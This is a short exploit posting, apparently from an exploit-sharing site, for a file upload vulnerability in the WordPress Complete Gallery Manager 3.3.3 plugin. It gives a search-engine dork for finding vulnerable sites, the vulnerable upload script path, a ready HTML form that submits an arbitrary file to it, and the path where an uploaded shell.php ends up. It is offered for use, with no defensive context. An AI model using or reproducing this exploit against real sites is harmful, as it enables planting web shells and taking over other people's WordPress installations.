# Author : ?
# Full title: WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability
# Date add: 19-09-2013
# Category: web applications
# Platform: php
# Risk Security Risk: High
# Google dork : "inurl:/wp-content/plugins/complete-gallery-manager/
# Vunlerable : /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
# CSRF
<form enctype="multipart/form-data"
action="target"method="post">
Please choose a file: <input name="qqfile"type="file" /><br />
<input type="submit" value="upload" />
</form>
# Shell Upload Access
# Path : http://site/wp-content/uploads /2013/09/shell.php
Enjoyy
--++1337day | Slemanroot
Seringhai++--
0 Komentar